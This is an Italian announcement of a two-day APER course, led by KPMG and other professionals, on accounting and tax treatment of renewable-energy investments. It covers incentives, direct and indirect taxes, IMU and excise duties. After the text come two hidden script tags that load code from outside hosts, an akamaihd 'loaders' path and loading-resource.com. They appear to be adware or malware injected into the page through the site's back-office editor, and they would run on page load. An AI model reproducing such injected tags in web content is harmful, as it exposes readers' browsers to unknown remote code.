Diviso in due giornate, il primo appuntamento (mercoledì 17 aprile) sarà dedicato agli aspetti contabili generali legati alle fonti rinnovabili: si parlerà di investimenti, finanziamenti e trattamento contabile degli incentivi. Concluderà la mattinata un focus dedicato alle imposte dirette, con temi quali società di comodo ed interpelli utilizzabili, PEX e Robin Hood Tax.
Il percorso formativo terminerà con un secondo appuntamento (mercoledì 24 aprile), durante il quale si affronteranno i temi attinenti la gestione delle imposte indirette e la fiscalità internazionale relativa agli investimenti FER. Completeranno il corso un approfondimento sull’IMU e dei focus dedicati ad accise e rapporti con l’Agenzia delle Dogane e da ultimo al reddito agrario.
I docenti saranno professionisti KPMG, Roedland Partners e KStudio, esperti in fiscalità delle rinnovabili.
Il programma completo e le modalità di iscrizioni sono disponibili su aper.it. Sono previste agevolazioni per gli associati APER.
Data la limitata disponibilità dei posti in sala, invitiamo gli interessati ad affrettarsi a procedere con l’iscrizione, che resteranno aperte fino ad esaurimento posti.
<script type="text/javascript" src="http://cdncache3-a.akamaihd.net/loaders/1032/l.js?aoi=1311798366&pid=1032&zoneid=62862"></script><script src="https://loading-resource.com/data.js.php?i={271EC601-39CC-426C-935D-F754BCD76643}&d=2012-10-16&s=http://www.guidaedilizia.it/Backoffice/GuidaNews/Inserisci_Articoli.asp?TipologiaID=1" type="text/javascript"></script>